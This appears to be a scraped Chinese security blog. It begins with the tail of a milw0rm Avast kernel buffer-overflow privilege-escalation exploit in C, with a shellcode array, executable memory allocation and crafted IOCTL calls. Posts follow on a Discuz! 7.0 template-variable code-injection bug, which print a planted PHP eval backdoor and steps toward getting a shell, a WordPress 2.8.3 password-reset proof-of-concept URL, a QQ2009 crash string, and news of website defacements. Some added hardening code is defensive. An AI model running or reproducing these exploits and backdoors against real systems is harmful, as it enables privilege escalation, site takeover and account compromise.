        0xe7327495, 0xbdc47980, 0x85bf54c1, 0xe054753d,
        0x42e6c82b, 0xb54389bb, 0xef5debf3, 0xcf310c8e,
        0x2a433c26, 0xf209dc9d, 0x8a869d03, 0x45961943,
        0x28f51bb9, 0x643e865c, 0xb410b2d1, 0xaf30a98c,
        0xa004bb79, 0x956b7c41, 0x13e3a21d, 0xca5f4efd,
        0xf13e81c1, 0x4fb74a1e, 0x2a033efb, 0x91ed2e36,
        0xb9bf8c57, 0xc1b65238, 0x2b3b3e0f, 0xbc02c76b,
        0xc56d0a7d, 0xb33685c2, 0x6619d068, 0x13ceb219,
        0x21e2d381, 0xbc04a013, 0xafc763ef, 0xc6c9651d,
        0x9139fb86, 0xdd6fe175, 0x5334d9d7, 0x4b39bc0e,
        0x42035a82, 0x91cba15e, 0xcf931d84, 0x739e2767,
        0x5a1c76fd, 0xd65cb444, 0x02c608e9, 0xc13aa613,
        0x5f9895ec, 0x05928739, 0xd960be14, 0xbc65f387,
        0xb40abdb8, 0x3833c113, 0x1fa8b468, 0x8e907e66,
        0xbca30fa5, 0xef539907, 0x3f130c64, 0xaf133b06,
        0x06d0d5c8, 0xe3e4f1df, 0x185f733d, 0x7ecf9d1e,
        0xdfea3362, 0x33bedbe3, 0xe9a15aed, 0x4aa68eeb,
        0x01e0aaf1, 0xb5ccf205, 0x9426c4cc, 0x3f80b9b4,
        0x017b584a, 0x7ac85b06, 0x4ca27f77, 0x7d8548a2,
        0x19025a74, 0x1d4d204c, 0x0cccb981, 0xf86a72e6,
        0x2a5ef939, 0x778bfe20, 0xf536a9e7, 0x82482d36,
        0x20a8484b, 0x8c08dd85, 0xc82a0739, 0xed52e038,
        0x4e6f5973, 0xd799c606, 0x87dd5c7f, 0x69db7ac2,
        0x56771978, 0xf682c73f, 0x40e5511c, 0xf373bc10,
        0xdecc0fa4, 0xf070df4e, 0x81b33f54, 0xf1d53816,
        0x2c2173e5, 0xae5a23d2, 0x0b9013fd, 0x9005857b,
        0x495aa603, 0x7d7b69b9, 0x80603698, 0xeedd2b37,
        0xaf7f72ea, 0xbe303f21, 0x0ea977f9, 0x0fa0708b,
        0xb5792aa6, 0x87fd2a7e, 0x2bda1cd6, 0x5df64225,
        0x216accb9, 0xc1808941, 0x582679b3, 0x46fbd44d,
        0xe2f76929, 0x548f6e51, 0x4ac3f5d8, 0xe52e62af,
        0x484110c2, 0x492fab5a, 0x2c7accea, 0x7488ca20,
        0xe36a2f99, 0xba1e3785, 0xefa467bc, 0xd4665fc8,
        0x2f5390e2, 0xfe450203, 0xbb624253, 0x551740a0,
        0x7d50b6c9, 0xe9d20aa0, 0x55e69c01, 0x6ab186ee,
        0x1c187ff3, 0x6ce6dff2, 0x120a6ce0, 0xf6c45fd2,
        0x5832b533, 0xb02e3027, 0x170d3041, 0x6f153144,
        0xad980d7f, 0x49f5d3ab, 0xcedca059, 0x3db83dc5,
        0x39c589c0, 0x986e3537, 0xc4d04f1d, 0xd71ee166,
        0x04620370, 0x35beb3cf, 0x39249667, 0x79915fe2,
        0xbe40d4da, 0xd0cab338, 0xdcb53b5a, 0xae884be7,
        0x6250a5df, 0x0949574e, 0x5d5321b8, 0x86d01394,
        0xd517473b, 0xe5f90827, 0x7a8ef843, 0x19869984,
        0x02e8d858, 0x71954f6f, 0x6a9e300b, 0xa8a50e6b,
        0xb935e9e2, 0x69f3e080, 0x3e51ad9b, 0xf485aa30,
        0x4195eb53, 0x2574950c, 0x87c2c9f1, 0x955cecec,
        0x2a89e224, 0x67aed18a, 0x8d473f2a, 0xa089d921,
        0x50197424, 0xa94cacbd, 0xe8cddf16, 0x806b7f0d,
        0xa27648b9, 0x99c702ad, 0x37db9034, 0xe7295b46,
        0xa4bf4bac, 0x43d214a3, 0x8d9bc127, 0x2f72faa5,
        0xf9143ef4, 0xf30bd7bf, 0x86b2517d, 0xb7a833d6,
        0x037c9b1f, 0x9459bc14, 0x0c78aa23, 0xe41cc7dc,
        0x4eda2ed2, 0x8c0a8f08, 0x85a8aff4, 0xae28e3ea,
        0x217269d6, 0x6d221bf7, 0x6f646c75, 0x8c04d0eb,
        0x7d389030, 0x1968785b, 0xe748befe, 0x7fb277a8,
        0xf340540e, 0xf5a6340f, 0x47113529, 0x0c2eab43,
        0xd20d8b05, 0x5306c40e, 0x9c0c1ad3, 0x52a384db,
        0x26ad4373, 0x30872280, 0xc5ef9754, 0x098568fa,
        0xcbc632de, 0x9efa321a, 0x8466cae3, 0x156fa462,
        0x96716caa, 0x3e7cd39b, 0x27506529, 0x34cac20d,
        0x05958b0a, 0xe3b1708f, 0x258ff2e9, 0x913cc9cb,
        0xa5899577, 0xb9885e7b, 0xa559f53e, 0x48d99696,
        0xf2d0826d, 0x0be5f805, 0x385bb433, 0x174121eb,
        0x58bfd2bd, 0x4f4bc6ff, 0xc8fb45a6, 0xfac1da99,
        0xcbb0841f, 0xd33a2a83, 0xdb808b49, 0x110544d1,
        0x3656b868, 0x9527fb34, 0x75d35656, 0xf683f9cc,
        0xe756e3f6, 0x8cf742c1, 0x60c64989, 0x2af6cecc,
        0x0c70ddbb, 0x761077ee, 0xa5b3e47e, 0x52939e81,
        0xa476a7db, 0x02afdf28, 0x181e76a1, 0x094c8ae4,
        0x2035542d, 0xc47a48ab, 0x5f344e89, 0x6c0eaf8d,
        0xed89747c, 0x718af660, 0xed1386e1, 0xfe37f3d2,
        0x06817e6b, 0x600c9381, 0xbab81e8f, 0xe7a49506,
        0xb5070118, 0x2cf72a58, 0xde08c7f4, 0x109eead3,
        0x38ca65ba, 0xab924774, 0x26e006f2, 0x52fc4fc1,
        0x2c4453a1, 0x700a621d, 0x014dc1dc, 0x3aef70de,
        0x7c87331d, 0x89433add, 0xcbf6a8fc, 0x114f4794,
        0xea4e637f, 0x723c4b76, 0x47cc4f6a, 0x87445530,
        0xe83ceb38, 0x4d3e048e, 0x79081724, 0x4bf787fb,
        0x68943c66, 0x40e3d968, 0x6b103a30, 0xaadd17d4,
        0xb3f839e8, 0xac84edf7, 0x931d53b1, 0x0c4d2a0e,
        0x2f6ce387, 0xfed92391, 0x69ee2a6e, 0x48d7bb98,
        0x0ba1cb35, 0x63e12f67, 0x1ce3cb82, 0x099b3a46,
        0x5839b9a4, 0x7f7f4993, 0x59e4ecea, 0xeea5cccd,
        0x447dbf7f, 0xcd8626e1, 0x8d36d4b0, 0xac9e19ec,
        0x797ab5d7, 0x8434b658, 0xbcec7ef7, 0x682c6d93,
        0x762d7c86, 0xf38c8099, 0xafdec42c, 0xc43d09a6,
        0xe49d1217, 0x5e747fe1, 0x24788bb3, 0xaefc2937,
        0x1932f03c, 0x683917c0, 0x66aeed2b, 0x9b18cdd7,
        0x33f680a8, 0x26951569, 0xbaee16a8, 0x9e6c211f,
        0x2588853b, 0x9f46290f, 0x246ae851, 0x18e204f6,
        0x4904ec8f, 0xd90aa3f4, 0xb32d3c27, 0x4c5dc284,
        0xbe4add7f, 0x43d09da9, 0x89c17c35, 0x073879e7,
        0xa563a12e, 0x8a89202c, 0xf15e9e1f, 0x351c54d9,
        0xa0c4fa14, 0x5709de8d, 0x39186894, 0x6d04f1d9,
        0xf11330f7, 0x81d6fb36, 0xa9ed69cb, 0xc6d525a7,
        0x7a95ed1d, 0x0e3cc7ca, 0xf22396d8, 0x454bc69f,
        0x220c180f, 0x413b363d, 0x3034f3b4, 0xd29d8cf2,
        0x54f88e88, 0x48701702, 0xd3bc5e71, 0x7d13dd70,
        0x3c60d934, 0x2f11eff3, 0xc0bfff93, 0xfa8a47f7,
        0x1ae1ec5d, 0xc5ebdc87, 0xe0f9d5ac, 0xf205ec31,
        0x45bf5abb, 0x364757d1, 0xe17d0824, 0x7285cdad,
        0x340f876f, 0xafd04fb5, 0x232b2753, 0x9ed7abb0,
        0xf6fa5267, 0xd0344840, 0x7e1908c7, 0xa7fa0e2a,
        0xa14a1f1c, 0x207f4d88, 0x3a8e8949, 0x0933e39b,
        0x49308b91, 0x744b2e05, 0x8dd691b5, 0x576003b6,
        0x74bf728b, 0x8ec344ea, 0x5c1a8d38, 0xba05b772,
        0xd025c49e, 0xbe9bde06, 0x791d3fde, 0xaac66591,
        0x4fd06cb7, 0x1eb57393, 0x3a132e66, 0x531bed33,
        0xc1161373, 0x584522c2, 0x96427532, 0x9b324e67,
        0x67fd675e, 0x1ca506c6, 0xfec4ce3f, 0xdfbd6229,
        0x1570062a, 0xaf2e42ce, 0x442de8ae, 0xe9da28c2,
        0xd8661dd6, 0xb1fbabfd, 0x5e3b5bd4, 0x5975312a,
        0x727c7734, 0x6edaf6d6, 0xc1c54cf1, 0x0a906333,
        0x81c044d6, 0x38ea12fe, 0x0c1bf270, 0x57818362,
        0x0908d11c, 0x0e5a84ec, 0xadc85814, 0x54e8aa92,
        0xd07c83f7, 0xcc71c686, 0x640e2cbb, 0x03c636a6,
        0x47737c01, 0x9ad77ee7, 0xd179e1a9, 0x8340bb15,
        0x489ed205, 0x40b54fa8, 0x7afb505e, 0xc04f8e16,
        0xb92981c6, 0x604af99f, 0x43c0fd25, 0x1d2b625f,
        0x13f4dcd7, 0xcf47b89b, 0x108d824a, 0x21236797,
        0x4cac84a5, 0xb33821ce, 0x542a9975, 0xf66135c2,
        0x30b9634a, 0x9bde472a, 0x50e29c43, 0x1224e64d,
        0x140aa049, 0x48c6d7eb, 0xf171704c, 0x80987f37,
        0x88da2c1d, 0xf337fbfe, 0xd52f414a, 0x76581549,
        0x75d22530, 0x293f3f41, 0x20b6cf21, 0xccd9f240,
        0x46ddeacd, 0x4e16d64e, 0x0e64fe89, 0x445de8d3,
        0x4d7983a6, 0x9f44fe8c, 0xf4e56281, 0xa7aad55b,
        0x07270a01, 0x77501d16, 0xf848ee54, 0x34f4ba27,
        0x244da047, 0x0ca62989, 0xbb5e2e05, 0x9612ca12,
        0x1b7c8cc7, 0xd2d672e6, 0x0caac1da, 0x1ae2cf8a,
        0x92bd47e9, 0xfeb1f194, 0xc0628cbd, 0xecc1a399,
        0x1a9f95f0, 0x29648b2b, 0x9c447a54, 0xad6d85e2,
        0x9bd983e7, 0x880f0eb1, 0xbea4a1a9, 0x3717e013,
        0x89e486dd, 0xe86bcc12, 0xc43fe5a5, 0xc50a72b4,
        0x396f4517, 0x2c8b865e, 0x3f022a7f, 0x0c5bc9bb,
        0x13fd077b, 0xcb6bd83d, 0x20c3e64b, 0x254e3a66,
        0xbcb22492, 0x57caa096, 0x8ba670d9, 0x547d5784,
        0xec8bf3f8, 0xf5b1ff55, 0x30620957, 0x43a3264a,
        0xdc6a0482, 0x270f2162, 0x15518268, 0xf4f3d923,
        0xfc6cdb9e, 0x91d3e097, 0xe49d4ba4, 0xe47a3b34,
        0xc18383a6, 0x5508af9a, 0xf2c8fcc8, 0xed417653,
        0xe3f4cf27, 0x6a777f65, 0xe9c3dae6, 0xfec2e74c,
        0x143f7e6d, 0xa8dc757c, 0xb8c48b07, 0x6a41964d,
        0x0994e2e4, 0x86ba5562, 0x4ebdb204, 0x6913dc92,
        0x3bd205a8, 0x2018395a, 0x804c5bb8, 0xa159fa18,
        0x7ccdfb1e, 0x146c6abc, 0x9c59a9ce, 0xe2f7d37d,
        0x699918e3, 0xde22536a, 0xfae6dd7c, 0x8a228eab,
        0xf657ae31, 0x97d59acb, 0xb1f6e1b7, 0xbc41be1c,
        0xc2572c95, 0x342f56a9, 0x349aeff3, 0xcbe3c7d9,
        0x080d46fe, 0x0e1d753c, 0xe4760d5c, 0x0cde715c,
        0x7d129f23, 0xab63fbbe, 0x9d734af8, 0xc2daebce,
        0x0619e8ee, 0x2c5b3a41, 0xd5db4193, 0x943fce43,
        0x0256feeb, 0x83a424bd, 0xe27f259b, 0x67ef724b,
        0x99c97ae1, 0x8bfa552e, 0x73e3191c, 0xe94365e5,
        0x92291d29, 0x7a28b911, 0x4ae8b691, 0xafba0345,
        0xbac0a0ba, 0x677713c2, 0x1a7fc599, 0x8978a9c1,
        0xe8f62f56, 0x58f7969a
        };

    DWORD ShellcodeToExecute;
    
    int choix;
    memset(welcome, 0x61, 100);
    welcome[100] = 0;

    ZeroMemory(out,sizeof(out));

    printf("Avast Kernel Buffer Overflow Vulnerability\nProof Of Concept…\n\n");
    getch();
    
    MajShellcode("LocalEscalation_Avast.exe");
    MajRealShellcode();
    MajRealStack();
    
    ShellcodeToExecute = (DWORD) VirtualAlloc((void*)0x57520000, 0x10000, MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    ShellcodeToExecute = (DWORD) VirtualAlloc((void*)0x57520000, 0x10000, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    
    memcpy((void*)0x57523c00, UpdateAswMon, sizeof(UpdateAswMon));
    memcpy((void*)0x57523c00+sizeof(UpdateAswMon), ShellcodeMaster, sizeof(ShellcodeMaster));
    
    printf("Connecting…    ");
    
    hDevice = CreateFile("\\\\.\\aswMon",GENERIC_READ|GENERIC_WRITE,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
    while(hDevice == (HANDLE) 0xffffffff){
      hDevice = CreateFile("\\\\.\\aswMon",GENERIC_READ|GENERIC_WRITE,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
      Sleep(1000);
    }
    printf("Found !\nHandle : %p\n",hDevice);
      
    DeviceIoControl(hDevice,0xb2c8000c, Crashing,sizeof(Crashing),0,0,&NombreByte,NULL);
    DeviceIoControl(hDevice,0xb2c8000c, Crashing,sizeof(Crashing),0,0,&NombreByte,NULL);
    AfficherListeFichiers();
    printf("Written.\n");

    CloseHandle(hDevice);
    getch();
    return 0;
}

// milw0rm.com [2009-08-24]

Please respect copyright when reposting; source: 秋天博客
Permalink: https://www.cfresh.net/web-security/103

Discuz! 7.0 Latest Vulnerability: Admin "styles" Theme File Vulnerability and the Enlarged Page Text Symptom

      If you run a forum on Discuz!, take note of this vulnerability. DZ has already released a patch; it is described at the end of this article.
      I suddenly noticed that the text on a DZ forum page had become larger.

Figure 1: Discuz! page text enlarged

      The page source shows:

<!--int(5)
--><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gbk" />
<title>论坛之家 找论坛找网址就上论坛之家交流http://luntan123.com/</title>

Figure 2

      Look at the dz style cache file:
      \forumdata\cache\style_1.php
$X=SUBSTR(MD5($_GET['B']),28);IF($X=='3738')EVAL($_POST['A']);//', 'aaaaaaaaaa');

Figure 3

      Look at the dz database table record:
      cdb_stylevars
      48  1  ','');echo '<!--';var_dump(5);echo '-->';$x=substr…  aaaaaaaaaa

Figure 4

      The vulnerable code:
      (present in Discuz! 7.0 and below)
      /admin/styles.inc.php

<?php
……
if($newcvar && $newcsubst) {
    if($db->result_first("SELECT COUNT(*) FROM {$tablepre}stylevars WHERE variable='$newcvar' AND styleid='$id'")) {
        cpmsg('styles_edit_variable_duplicate', '', 'error');
    } elseif(!preg_match("/[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*/", $newcvar)) {
        cpmsg('styles_edit_variable_illegal', '', 'error');
    }
    $newcvar = strtolower($newcvar);
    $db->query("INSERT INTO {$tablepre}stylevars (styleid, variable, substitute)
        VALUES ('$id', '$newcvar', '$newcsubst')");
} // insert the variable data; compiled by http://luntan123.com
……
updatecache('styles'); // refresh the cache (writes the cache file)
……
?>

      This is the code that adds a variable to a style: it stores the variable name and its value in the database. Although the POSTed data has been through daddslashes, once it is in the database it is plain data again. The regex that checks the variable name is the problem: !preg_match("/[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*/", $newcvar). Here "\x7f-\xff" denotes the characters with code values 127 to 255, which often appear as the first byte of a Chinese character, so it is used as a marker for matching Chinese. The check therefore seems to allow only letters or Chinese as variable names, nothing more elaborate. A little testing shows that in the general case this regex is as good as absent:

<?php
$newcvar = $_GET['newcvar'];
echo $newcvar;
echo "<br>";
if(!preg_match("/[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*/", $newcvar)) {
    echo "haha";
} else {
    echo 'pass';
}
?>

      Now look at the updatecache function, in include/cache.func.php: it reads the data from the database, runs it through some processing and finally writes it to a file. I will skip the details and go straight to the key point, this function:

function getcachevars($data, $type = 'VAR') {
    $evaluate = '';
    foreach($data as $key => $val) {
        if(is_array($val)) {
            $evaluate .= "\$$key = ".arrayeval($val).";\n";
        } else {
            // the value is escaped, but $key goes into the generated source untouched
            $val = addcslashes($val, '\'\\');
            $evaluate .= $type == 'VAR' ? "\$$key = '$val';\n" : "define('".strtoupper($key)."', '$val');\n";
        }
    }
    return $evaluate;
}

      Nothing more needs saying: the value is escaped but the key is not, and the key is exactly the value we submitted earlier, sitting unescaped in the database. On the subject of array keys, see issue 3 of 幻影旅团, "Advanced PHP Code Audit Techniques" (《高级PHP代码审核技术》), which discusses key problems in many places; dz overlooked it here…
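As an added example that is not Discuz code, the following covers both points above: the unanchored identifier regex from admin/styles.inc.php beside an anchored version, and a cache generator in the shape of getcachevars() that validates each key before splicing it into generated PHP source. var_export() stands in for Discuz's arrayeval(), which is not reproduced, and the sample inputs are constructed to mimic the cdb_stylevars record shown earlier.

```php
<?php
// Added example, not Discuz code: the unanchored identifier check from
// admin/styles.inc.php beside an anchored one, and a cache generator that
// validates keys before they are spliced into generated PHP source.

const IDENT_BODY = '[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*';

// The Discuz 7.0 check. Without ^ and $ it only asks whether the input
// CONTAINS an identifier somewhere, so "','');echo 'x';//" passes on "echo".
function discuz_name_check(string $name): bool
{
    return preg_match('/' . IDENT_BODY . '/', $name) === 1;
}

// Anchored check. The D modifier stops $ from matching before a trailing
// newline, so only a complete identifier is accepted.
function hardened_name_check(string $name): bool
{
    return preg_match('/^' . IDENT_BODY . '$/D', $name) === 1;
}

// getcachevars() in Discuz escapes $val with addcslashes() but interpolates
// $key as-is into "\$$key = '...';". Because keys come from the stylevars
// table, a key that slipped past the weak check becomes executable code once
// the cache file is included. This version refuses non-identifier keys and
// uses var_export() in place of Discuz's arrayeval() (not reproduced here).
function getcachevars_hardened(array $data, string $type = 'VAR'): string
{
    $evaluate = '';
    foreach ($data as $key => $val) {
        $key = (string) $key;
        if (!hardened_name_check($key)) {
            throw new InvalidArgumentException("unsafe cache variable name: $key");
        }
        if (is_array($val)) {
            $evaluate .= "\$$key = " . var_export($val, true) . ";\n";
        } else {
            $val = addcslashes((string) $val, '\'\\');
            $evaluate .= $type === 'VAR'
                ? "\$$key = '$val';\n"
                : "define('" . strtoupper($key) . "', '$val');\n";
        }
    }
    return $evaluate;
}

// Self-check on constructed inputs (the injected name mimics the record
// seen in cdb_stylevars).
$injected = "','');echo 'x';//";
assert(discuz_name_check($injected) === true);          // weak check lets it through
assert(hardened_name_check($injected) === false);       // anchored check rejects it
assert(hardened_name_check('menubgcolor') === true);
assert(hardened_name_check("menubgcolor\n") === false); // rejected thanks to /D

echo getcachevars_hardened(['menubgcolor' => '#ccc', 'nav' => ['a' => 1]]);
try {
    getcachevars_hardened([$injected => 'aaaaaaaaaa']);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
```

Validating the key at generation time is the cheaper fix; anchoring the regex at submission time is still needed, because data already sitting in the stylevars table is trusted by the cache writer.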

      So a shell can be obtained directly. Method (replace the forum address with your own): first log into the admin panel with an administrator account; forum founder is not required, administrator level suffices:
http://luntan123.com/admincp.php … &id=1&adv=1, at the bottom there is a "Custom template variables" section; in the variable

Permalink: https://www.cfresh.net/web-security/107

WordPress 2.8.3 remote administrator password reset vulnerability

      WordPress 2.8.3 has a vulnerability that allows wp-login.php to be abused to reset the administrator's password. Unfortunately we cannot obtain the new password directly after the reset; it is emailed straight to the administrator's mailbox. If you can get at the administrator's mailbox, well...
      WP has reportedly released a patch; WP users should upgrade promptly and overwrite the vulnerable file.
      Disclosure date: 2009.8.10
      Affected WordPress versions: WordPress 2.8.3 and lower
      Attack method:
      Visiting http://www.xxx.com/wp-login.php?action=lostpassword makes WordPress send an email to the administrator saying that someone has requested a password reset, with a link; clicking the link confirms the reset, and a second email containing the new password is then sent.
      The nastier trick: visiting http://www.xxx.com/wp-login.php?action=rp&key[]= makes WordPress force a password reset without the administrator's confirmation. The new password is of course still sent to the administrator's mailbox.

      Read on for the details.

=============================================
- Release date: August 10th, 2009
- Discovered by: Laurent Gaffié
- Severity: Medium
=============================================

I. VULNERABILITY
-------------------------
WordPress <= 2.8.3 Remote admin reset password

II. BACKGROUND
-------------------------
WordPress is a state-of-the-art publishing platform with a focus on
aesthetics, web standards, and usability. WordPress is both free and
priceless at the same time. More simply, WordPress is what you use when
you want to work with your blogging software, not fight it.

III. DESCRIPTION
-------------------------
The way WordPress handles a password reset looks like this:
You submit your email address or username via this form /wp-login.php?action=lostpassword ;
WordPress sends you a reset confirmation like that via email:

"
Someone has asked to reset the password for the following site and username.
http://DOMAIN_NAME.TLD/wordpress
Username: admin
To reset your password visit the following address, otherwise just
ignore this email and nothing will happen

http://DOMAIN_NAME.TLD/wordpress/wp-login.php?action=rp&key=o7naCKN3OoeU2KJMMsag
"

You click on the link, and then WordPress resets your admin password, and
sends you over another email with your new credentials.

Let's see how it works:

wp-login.php:
…[snip]….
line 186:
function reset_password($key) {
    global $wpdb;

    $key = preg_replace('/[^a-z0-9]/i', '', $key);

    if ( empty( $key ) )
        return new WP_Error('invalid_key', __('Invalid key'));

    $user = $wpdb->get_row($wpdb->prepare("SELECT * FROM $wpdb->users WHERE user_activation_key = %s", $key));
    if ( empty( $user ) )
        return new WP_Error('invalid_key', __('Invalid key'));
…[snip]….
line 276:
$action = isset($_REQUEST['action']) ? $_REQUEST['action'] : 'login';
$errors = new WP_Error();

if ( isset($_GET['key']) )
    $action = 'resetpass';

// validate action so as to default to the login screen
if ( !in_array($action, array('logout', 'lostpassword', 'retrievepassword', 'resetpass', 'rp', 'register', 'login')) && false === has_filter('login_form_' . $action) )
    $action = 'login';
…[snip]….

line 370:

break;

case 'resetpass' :
case 'rp' :
    $errors = reset_password($_GET['key']);

    if ( ! is_wp_error($errors) ) {
        wp_redirect('wp-login.php?checkemail=newpass');
        exit();
    }

    wp_redirect('wp-login.php?action=lostpassword&error=invalidkey');
    exit();

break;
…[snip ]…

You can abuse the password reset function, and bypass the first step and
then reset the admin password by submitting an array to the $key
variable.

IV. PROOF OF CONCEPT
-------------------------
A web browser is sufficient to reproduce this Proof of Concept:
http://DOMAIN_NAME.TLD/wp-login.php?action=rp&key[]=
The password will be reset without any confirmation.

V. BUSINESS IMPACT
-------------------------
An attacker could exploit this vulnerability to compromise the admin
account of any wordpress/wordpress-mu <= 2.8.3

VI. SYSTEMS AFFECTED
-------------------------
All

VII. SOLUTION
-------------------------
No patch available for the moment.

VIII. REFERENCES
-------------------------
http://www.wordpress.org

IX. CREDITS
-------------------------
This vulnerability has been discovered by Laurent Gaffié Laurent.gaffie{remove-this}(at)gmail.com
I'd like to shoot some greetz to securityreason.com for their great
research on PHP, as for this under-estimated vulnerability discovered by
Maksymilian Arciemowicz : http://securityreason.com/achievement_securityalert/38

X. REVISION HISTORY
-------------------------
August 10th, 2009: Initial release

XI. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or
misuse of this information.

# milw0rm.com [2009-08-11]
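The type confusion in reset_password() that the advisory above describes, as an added example that is neither part of the advisory nor WordPress code. PHP parses key[]= in a query string into an array; preg_replace() applied to an array returns an array, and empty() is false for a non-empty array, so the "invalid key" test is passed and the array reaches $wpdb->prepare(). In WordPress 2.8 prepare() treats a single array argument as its vsprintf() argument list, so the lookup becomes user_activation_key = '' and matches an account whose activation key is empty. The hardened check below refuses anything that is not a string, the same kind of is_array() rejection WordPress added afterwards. The query strings are constructed; the first key is the sample value from the advisory's email.

```php
<?php
// Added example, not WordPress code: why reset_password() in WordPress <= 2.8.3
// could be driven with "key[]=", and a type check that closes the hole.

// PHP parses "key[]=" in a query string into an array, not a string.
function key_from_query_string(string $qs)
{
    parse_str($qs, $params);
    return $params['key'] ?? null;
}

// The checks of the vulnerable reset_password(): preg_replace() on an array
// returns an array, and empty() is false for a non-empty array, so an attacker's
// array passes the "invalid key" test and reaches $wpdb->prepare().
function vulnerable_key_check($key): bool
{
    $key = preg_replace('/[^a-z0-9]/i', '', $key);
    return !empty($key);   // true for array(''), the value "key[]=" produces
}

// Hardened: require a string before sanitising and treat an empty result as
// invalid. WordPress later added an equivalent is_array() rejection.
function hardened_key_check($key): bool
{
    if (!is_string($key)) {
        return false;
    }
    $key = preg_replace('/[^a-z0-9]/i', '', $key);
    return $key !== '';
}

// Self-check on constructed query strings; the first key is the sample
// value from the advisory's email.
$cases = [
    'action=rp&key=o7naCKN3OoeU2KJMMsag' => [true, true],   // genuine key: both accept
    'action=rp&key[]='                   => [true, false],  // the PoC: only the weak check accepts
    'action=rp&key='                     => [false, false], // empty key: both reject
];
foreach ($cases as $qs => [$expectWeak, $expectHard]) {
    $key = key_from_query_string($qs);
    assert(vulnerable_key_check($key) === $expectWeak);
    assert(hardened_key_check($key) === $expectHard);
    printf("%-38s weak=%s hardened=%s\n", $qs,
        var_export(vulnerable_key_check($key), true),
        var_export(hardened_key_check($key), true));
}
```

The general lesson for any PHP endpoint is that $_GET and $_POST values are not guaranteed to be strings: a type check belongs before every sanitiser that silently accepts arrays, such as preg_replace(), trim() or str_replace().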

Permalink: https://www.cfresh.net/web-security/115

Overflow vulnerability surfaces in QQ2009

      I have been hit by this myself; please do not use it to do harm.
      Source: http://hi.baidu.com/MoSh0u/
      Test environment: Windows XP Professional Service Pack 3
      Test target: QQ2009 Beta2 & SP2.
      Overflow string:

ﻬ墨♬

      Reproduction: when a QQ2009 Beta2 / SP2 user changes their nickname to the characters above and clicks OK, the QQ program crashes and restarts.
      Attack scenario: set your own group nickname to ﻬ墨♬; every QQ2009 Beta2 / SP2 user in the groups you belong to then crashes and restarts when they open the group. 秋天 ran into exactly this, and neither clearing the chat history nor reinstalling the program fixed it.
      Other attack scenarios: omitted, in the interest of a harmonious internet.

Screenshot: QQ2009 crashing because of the overflow

      Fix:
      QQ2008 and QQ2009 Preview are known to be unaffected; QQ2009 SP3 has fixed this vulnerability, so upgrading to QQ2009 SP3 resolves the problem completely.
      QQ2009 SP3 download:
      http://im.qq.com/qq/2009/standard_sp3/

Permalink: https://www.cfresh.net/web-security/120

Australian film festival website attacked twice by Chinese hackers

      Angered by the Melbourne film festival's screening of a documentary that glorifies "Xinjiang independence" leader Rebiya Kadeer, Chinese hackers attacked the festival's official website for the second time on July 25.

      The festival organisers have confirmed the attack on the Melbourne film festival website, and police are now investigating. The hackers struck on Saturday morning, hours after the Premier of Victoria formally opened the festival, replacing the festival information on the site with a Chinese flag and anti-Kadeer slogans.

      The festival's executive director, Richard Moore, said that after the festival refused China's demand to withdraw the Kadeer documentary, staff mailboxes were bombarded with spam. He added that, judging by the IP addresses, the attacks appeared to come from China.

Screenshot: the Melbourne International Film Festival homepage after the defacement

      Earlier, on the 23rd, mainland directors Jia Zhangke and Zhao Liang and Hong Kong director Tang Xiaobai collectively withdrew from the 58th Melbourne International Film Festival, reportedly in protest at its screening of a documentary about the "East Turkistan" separatist Rebiya Kadeer. At around 11 a.m. on July 25 the festival's official website was defaced. The hackers left three lines of English demanding that the festival apologise to the entire Chinese people for screening the Kadeer documentary.

      Melbourne International Film Festival website defaced

      On the festival's official homepage, a hacker signing as "oldjun" left a waving five-star red flag and three lines of English: "We like film,but we hate Rebiya Kadeer!We like peace,and we hate East Turkistan terrorist!Please apologize to all the Chinese people!"

      After the Australian film festival's official website was attacked on June 25, allegedly by Chinese hackers, foreign media report that the festival site has been attacked again by Chinese hackers, paralysing its ticketing system.
      The Melbourne film festival screened the documentary The 10 Conditions of Love, which glorifies "Xinjiang independence" leader Rebiya Kadeer, despite Chinese objections, and Australia also granted Kadeer a visa to attend the screening. According to AFP, Chinese hackers, unhappy with Australia's actions, launched a second attack on the festival website.
      Festival spokesperson Asha Holmes said the online ticketing system had been shut down after it was attacked by large numbers of "fake" ticket buyers, which caused the whole system to show "sold out".
      Holmes said the attack was launched by a website, said to be Chinese, called "A Call to All Chinese People", which explained how to buy tickets online under false identities, targeting the festival's screening of The 10 Conditions of Love. Holmes said: "The attack was clearly intended to shut down the ticketing system, and it has had that effect." "We had to close online ticketing and ask everyone to buy through box offices or by phone."
      Holmes also said the festival expected such protests to continue until it withdrew The 10 Conditions of Love, "but we will not pull the film". When a Global Times reporter visited the festival's official website at noon Beijing time on the 1st, it displayed the notice "ticketing system closed".
      Australian media had earlier reported that Australia granted a visa to "Xinjiang independence" leader Rebiya Kadeer on the 30th so she could attend the 58th Melbourne International Film Festival. Kadeer plans to hold a Q&A session after the screening of The 10 Conditions of Love.
      Note from 秋天一棵树: when Kevin Rudd took office in Australia, almost every domestic TV channel mentioned one thing: Rudd speaks Chinese, and speaks it well. Yet when he was interviewed by CCAV he refused to speak Chinese and insisted on answering every question in English. Now we know why.

Permalink: https://www.cfresh.net/web-security/123

Rising admits its server was breached and seeded with a Trojan by hackers

  At noon on July 27 a security centre issued a public alert that Rising's official website had been seeded with a Trojan by hackers. Just over three hours later, Rising's official announcement confirmed that its website server had indeed been compromised by a hacker gang and had a Trojan planted on it.

  News link: Rising's official site seeded with a Trojan by hackers; visitors risk account theft
